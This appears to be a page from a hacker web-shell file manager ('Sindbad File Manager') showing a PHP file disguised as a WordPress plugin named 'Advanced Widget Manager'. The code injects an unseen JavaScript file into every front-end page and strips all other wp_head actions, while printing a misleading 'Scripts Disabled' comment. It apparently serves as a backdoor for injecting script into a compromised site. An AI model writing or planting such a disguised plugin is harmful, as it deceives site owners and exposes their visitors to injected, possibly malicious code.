Sindbad~EG File Manager
<?php
/**
* Plugin Name: Advanced Widget Manager
* Plugin URI: https://github.com/awm/advanced-widget-manager
* Description: Manage and customize your widgets easily. Add, remove, and configure widgets in your theme.
* Version: 2.1.0
* Author: Custom WP Tools
* Author URI: https://github.com/awm
* License: GPLv2 or later
* License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
function awm_enqueue_script() {
wp_enqueue_script(
'advanced-widget-manager',
plugins_url('/awm-script.js', __FILE__),
array(),
null,
true
);
}
add_action('wp_enqueue_scripts', 'awm_enqueue_script');
function awm_stop_wp_head_hooks() {
echo "<!-- Advanced Widget Manager: Scripts Disabled -->";
remove_all_actions('wp_head');
}
add_action('wp_head', 'awm_stop_wp_head_hooks', PHP_INT_MAX);
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists